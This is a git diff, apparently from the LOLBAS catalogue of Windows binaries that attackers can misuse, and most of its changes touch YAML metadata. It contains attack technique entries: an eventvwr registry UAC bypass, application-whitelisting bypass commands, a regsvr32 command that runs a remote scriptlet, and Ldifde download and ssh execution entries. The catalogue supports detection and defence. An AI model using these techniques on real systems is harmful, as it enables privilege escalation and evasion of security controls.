Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||||
Category: UAC bypass
|
Category: UAC Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1548.002
|
MitreID: T1548.002
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
@ -31,4 +31,3 @@ Acknowledgement:
|
|||||||
Handle: '@enigma0x3'
|
Handle: '@enigma0x3'
|
||||||
- Person: Matt Graeber
|
- Person: Matt Graeber
|
||||||
Handle: '@mattifestation'
|
Handle: '@mattifestation'
|
||||||
---
|
|
||||||
|
@ -41,4 +41,3 @@ Acknowledgement:
|
|||||||
Handle: '@infosecn1nja'
|
Handle: '@infosecn1nja'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -37,4 +37,3 @@ Acknowledgement:
|
|||||||
Handle: '@CyberRaiju'
|
Handle: '@CyberRaiju'
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
Name: Extexport.exe
|
Name: Extexport.exe
|
||||||
Description:
|
Description: Load a DLL located in the c:\test folder with a specific name.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
@ -24,4 +24,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@hexacorn'
|
Handle: '@hexacorn'
|
||||||
---
|
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
Name: Extrac32.exe
|
Name: Extrac32.exe
|
||||||
Description:
|
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
@ -54,4 +54,3 @@ Acknowledgement:
|
|||||||
Handle: '@VakninHai'
|
Handle: '@VakninHai'
|
||||||
- Person: Tamir Yehuda
|
- Person: Tamir Yehuda
|
||||||
Handle: '@tim8288'
|
Handle: '@tim8288'
|
||||||
---
|
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
Name: Findstr.exe
|
Name: Findstr.exe
|
||||||
Description:
|
Description: Write to ADS, discover, or download files with Findstr.exe
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
@ -45,4 +45,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -28,4 +28,3 @@ Acknowledgement:
|
|||||||
Handle: '@Ocelotty6669'
|
Handle: '@Ocelotty6669'
|
||||||
- Person: Malwrologist
|
- Person: Malwrologist
|
||||||
Handle: '@DissectMalware'
|
Handle: '@DissectMalware'
|
||||||
---
|
|
||||||
|
@ -25,4 +25,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Carlos Perez
|
- Person: Carlos Perez
|
||||||
Handle: '@Carlos_Perez'
|
Handle: '@Carlos_Perez'
|
||||||
---
|
|
||||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
|||||||
Handle: '@vector_sec'
|
Handle: '@vector_sec'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -38,4 +38,3 @@ Acknowledgement:
|
|||||||
Handle: ''
|
Handle: ''
|
||||||
- Person: Amit Serper
|
- Person: Amit Serper
|
||||||
Handle: '@0xAmit'
|
Handle: '@0xAmit'
|
||||||
---
|
|
||||||
|
@ -176,4 +176,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jesus Galvez
|
- Person: Jesus Galvez
|
||||||
Handle:
|
Handle:
|
||||||
---
|
|
||||||
|
@ -32,4 +32,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -35,4 +35,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -20,4 +20,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Wade Hickey
|
- Person: Wade Hickey
|
||||||
Handle: '@notwhickey'
|
Handle: '@notwhickey'
|
||||||
---
|
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
Name: Ie4uinit.exe
|
Name: Ie4uinit.exe
|
||||||
Description:
|
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
@ -27,4 +27,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
|
||||||
|
@ -34,4 +34,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
|
||||||
|
@ -33,4 +33,3 @@ Acknowledgement:
|
|||||||
Handle: '@VakninHai'
|
Handle: '@VakninHai'
|
||||||
- Person: Lior Adar
|
- Person: Lior Adar
|
||||||
Handle:
|
Handle:
|
||||||
---
|
|
||||||
|
@ -26,4 +26,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Kyle Hanslovan
|
- Person: Kyle Hanslovan
|
||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
---
|
|
||||||
|
@ -7,7 +7,7 @@ Commands:
|
|||||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
Description: Execute the target .NET DLL or EXE.
|
Description: Execute the target .NET DLL or EXE.
|
||||||
Usecase: Use to execute code and bypass application whitelisting
|
Usecase: Use to execute code and bypass application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.004
|
MitreID: T1218.004
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
@ -39,4 +39,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
|
||||||
|
@ -34,4 +34,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Malwrologist
|
- Person: Malwrologist
|
||||||
Handle: '@DissectMalware'
|
Handle: '@DissectMalware'
|
||||||
---
|
|
||||||
|
30
yml/OSBinaries/Ldifde.yml
Normal file
30
yml/OSBinaries/Ldifde.yml
Normal file
@ -0,0 +1,30 @@
|
|||||||
|
---
|
||||||
|
Name: Ldifde.exe
|
||||||
|
Description: Creates, modifies, and deletes LDAP directory objects.
|
||||||
|
Author: 'Grzegorz Tworek'
|
||||||
|
Created: 2022-08-31
|
||||||
|
Commands:
|
||||||
|
- Command: Ldifde -i -f inputfile.ldf
|
||||||
|
Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
|
||||||
|
Usecase: Download file from Internet
|
||||||
|
Category: Download
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1105
|
||||||
|
OperatingSystem: Windows Server with AD Domain Services role, Windows 10 with AD LDS role.
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\windows\system32\ldifde.exe
|
||||||
|
- Path: c:\windows\syswow64\ldifde.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC:
|
||||||
|
- Analysis:
|
||||||
|
- Sigma:
|
||||||
|
- Elastic:
|
||||||
|
- Splunk:
|
||||||
|
- BlockRule:
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/0gtweet/status/1564968845726580736
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Grzegorz Tworek
|
||||||
|
Handle: '@0gtweet'
|
@ -40,4 +40,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -36,4 +36,3 @@ Acknowledgement:
|
|||||||
Handle: '@gN3mes1s'
|
Handle: '@gN3mes1s'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -56,4 +56,3 @@ Acknowledgement:
|
|||||||
Handle: '@FortyNorthSec'
|
Handle: '@FortyNorthSec'
|
||||||
- Person: Bank Security
|
- Person: Bank Security
|
||||||
Handle: '@Bank_Security'
|
Handle: '@Bank_Security'
|
||||||
---
|
|
||||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
|||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
- Person: clem
|
- Person: clem
|
||||||
Handle: '@clavoillotte'
|
Handle: '@clavoillotte'
|
||||||
---
|
|
||||||
|
@ -53,4 +53,3 @@ Acknowledgement:
|
|||||||
Handle: ''
|
Handle: ''
|
||||||
- Person: Cedric
|
- Person: Cedric
|
||||||
Handle: '@th3c3dr1c'
|
Handle: '@th3c3dr1c'
|
||||||
---
|
|
||||||
|
@ -7,7 +7,7 @@ Commands:
|
|||||||
- Command: msbuild.exe pshell.xml
|
- Command: msbuild.exe pshell.xml
|
||||||
Description: Build and execute a C# project stored in the target XML file.
|
Description: Build and execute a C# project stored in the target XML file.
|
||||||
Usecase: Compile and run code
|
Usecase: Compile and run code
|
||||||
Category: AWL bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127.001
|
MitreID: T1127.001
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
@ -78,4 +78,3 @@ Acknowledgement:
|
|||||||
Handle: '@Cneelis'
|
Handle: '@Cneelis'
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
|
||||||
|
@ -24,4 +24,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
|
||||||
|
@ -14,7 +14,7 @@ Commands:
|
|||||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||||
Usecase: Execute code bypass Application whitelisting
|
Usecase: Execute code bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
@ -33,4 +33,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
|
||||||
|
@ -69,4 +69,3 @@ Acknowledgement:
|
|||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -51,4 +51,3 @@ Acknowledgement:
|
|||||||
Handle: '@netbiosX'
|
Handle: '@netbiosX'
|
||||||
- Person: Philip Tsukerman
|
- Person: Philip Tsukerman
|
||||||
Handle: '@PhilipTsukerman'
|
Handle: '@PhilipTsukerman'
|
||||||
---
|
|
||||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
|||||||
Handle:
|
Handle:
|
||||||
- Person: 'Xabier Ugarte-Pedrero'
|
- Person: 'Xabier Ugarte-Pedrero'
|
||||||
Handle:
|
Handle:
|
||||||
---
|
|
||||||
|
@ -36,4 +36,3 @@ Acknowledgement:
|
|||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@Hexacorn'
|
Handle: '@Hexacorn'
|
||||||
---
|
|
||||||
|
@ -19,4 +19,3 @@ Detection:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Elliot Killick
|
- Person: Elliot Killick
|
||||||
Handle: '@elliotkillick'
|
Handle: '@elliotkillick'
|
||||||
---
|
|
||||||
|
@ -21,4 +21,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Elliot Killick
|
- Person: Elliot Killick
|
||||||
Handle: '@elliotkillick'
|
Handle: '@elliotkillick'
|
||||||
---
|
|
||||||
|
@ -38,4 +38,3 @@ Acknowledgement:
|
|||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
- Person: Fab
|
- Person: Fab
|
||||||
Handle: '@0rbz_'
|
Handle: '@0rbz_'
|
||||||
---
|
|
||||||
|
@ -22,4 +22,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
|
||||||
|
@ -31,4 +31,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Derek Johnson
|
- Person: Derek Johnson
|
||||||
Handle: ''
|
Handle: ''
|
||||||
---
|
|
||||||
|
@ -22,4 +22,3 @@ Acknowledgement:
|
|||||||
Handle: '@LuxNoBulIshit'
|
Handle: '@LuxNoBulIshit'
|
||||||
- Person: Avihay eldad
|
- Person: Avihay eldad
|
||||||
Handle: '@aloneliassaf'
|
Handle: '@aloneliassaf'
|
||||||
---
|
|
||||||
|
@ -25,4 +25,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
|
||||||
|
@ -40,4 +40,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -28,4 +28,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Elliot Killick
|
- Person: Elliot Killick
|
||||||
Handle: '@elliotkillick'
|
Handle: '@elliotkillick'
|
||||||
---
|
|
||||||
|
@ -25,4 +25,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Leon Rodenko
|
- Person: Leon Rodenko
|
||||||
Handle: '@L3m0nada'
|
Handle: '@L3m0nada'
|
||||||
---
|
|
||||||
|
@ -24,4 +24,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: FireEye
|
- Person: FireEye
|
||||||
Handle: '@FireEye'
|
Handle: '@FireEye'
|
||||||
---
|
|
||||||
|
@ -41,4 +41,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Grzegorz Tworek
|
- Person: Grzegorz Tworek
|
||||||
Handle: '@0gtweet'
|
Handle: '@0gtweet'
|
||||||
---
|
|
@ -36,4 +36,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -7,7 +7,7 @@ Commands:
|
|||||||
- Command: regasm.exe AllTheThingsx64.dll
|
- Command: regasm.exe AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
Usecase: Execute code and bypass Application whitelisting
|
Usecase: Execute code and bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL Bypass
|
||||||
Privileges: Local Admin
|
Privileges: Local Admin
|
||||||
MitreID: T1218.009
|
MitreID: T1218.009
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
@ -38,4 +38,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
|
||||||
|
@ -31,4 +31,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -25,4 +25,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Eli Salem
|
- Person: Eli Salem
|
||||||
Handle: '@elisalem9'
|
Handle: '@elisalem9'
|
||||||
---
|
|
||||||
|
@ -24,4 +24,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Philip Tsukerman
|
- Person: Philip Tsukerman
|
||||||
Handle: '@PhilipTsukerman'
|
Handle: '@PhilipTsukerman'
|
||||||
---
|
|
||||||
|
@ -14,8 +14,8 @@ Commands:
|
|||||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
Usecase: Execute dll file and bypass Application whitelisting
|
Usecase: Execute dll file and bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: Local Admin
|
||||||
MitreID: T1218.009
|
MitreID: T1218.009
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
Full_Path:
|
Full_Path:
|
||||||
@ -34,4 +34,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
|
||||||
|
@ -7,14 +7,14 @@ Commands:
|
|||||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.010
|
MitreID: T1218.010
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.010
|
MitreID: T1218.010
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
@ -57,4 +57,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
|
||||||
|
@ -32,4 +32,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: elceef
|
- Person: elceef
|
||||||
Handle: '@elceef'
|
Handle: '@elceef'
|
||||||
---
|
|
||||||
|
@ -39,4 +39,3 @@ Acknowledgement:
|
|||||||
Handle: '@splinter_code'
|
Handle: '@splinter_code'
|
||||||
- Person: ap
|
- Person: ap
|
||||||
Handle: '@decoder_it'
|
Handle: '@decoder_it'
|
||||||
---
|
|
||||||
|
@ -80,6 +80,7 @@ Resources:
|
|||||||
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
|
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
|
||||||
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
|
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
|
||||||
- Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
|
- Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
|
||||||
|
- Link: https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
@ -91,4 +92,3 @@ Acknowledgement:
|
|||||||
Handle: '@404death'
|
Handle: '@404death'
|
||||||
- Person: Martin Ingesen
|
- Person: Martin Ingesen
|
||||||
Handle: '@Mrtn9'
|
Handle: '@Mrtn9'
|
||||||
---
|
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
Name: Runonce.exe
|
Name: Runonce.exe
|
||||||
Description:
|
Description: Executes a Run Once Task that has been configured in the registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
@ -27,4 +27,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
Name: Runscripthelper.exe
|
Name: Runscripthelper.exe
|
||||||
Description:
|
Description: Execute target PowerShell script
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
@ -26,4 +26,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Matt Graeber
|
- Person: Matt Graeber
|
||||||
Handle: '@mattifestation'
|
Handle: '@mattifestation'
|
||||||
---
|
|
||||||
|
@ -36,4 +36,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -33,4 +33,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
Name: Scriptrunner.exe
|
Name: Scriptrunner.exe
|
||||||
Description:
|
Description: Execute binary through proxy binary to evade defensive counter measures
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
@ -33,4 +33,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Nick Tyrer
|
- Person: Nick Tyrer
|
||||||
Handle: '@nicktyrer'
|
Handle: '@nicktyrer'
|
||||||
---
|
|
||||||
|
@ -31,4 +31,3 @@ Acknowledgement:
|
|||||||
Handle: '@hexacorn'
|
Handle: '@hexacorn'
|
||||||
- Person: Elliot Killick
|
- Person: Elliot Killick
|
||||||
Handle: '@elliotkillick'
|
Handle: '@elliotkillick'
|
||||||
---
|
|
||||||
|
27
yml/OSBinaries/Ssh.yml
Normal file
27
yml/OSBinaries/Ssh.yml
Normal file
@ -0,0 +1,27 @@
|
|||||||
|
---
|
||||||
|
Name: ssh.exe
|
||||||
|
Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
|
||||||
|
Author: 'Akshat Pradhan'
|
||||||
|
Created: '2021-11-08'
|
||||||
|
Commands:
|
||||||
|
- Command: ssh localhost calc.exe
|
||||||
|
Description: Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
|
||||||
|
Usecase: Execute specified command, can be used for defense evasion.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1202
|
||||||
|
OperatingSystem: Windows 10 1809, Windows Server 2019
|
||||||
|
- Command: ssh localhost calc.exe
|
||||||
|
Description: Executes calc.exe.
|
||||||
|
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
OperatingSystem: Windows 10 1809, Windows Server 2019
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\windows\system32\OpenSSH\ssh.exe
|
||||||
|
Detection:
|
||||||
|
- IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
|
||||||
|
- IOC: command line arguments specifying execution.
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Akshat Pradhan
|
@ -22,4 +22,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Eral4m
|
- Person: Eral4m
|
||||||
Handle: '@eral4m'
|
Handle: '@eral4m'
|
||||||
---
|
|
||||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user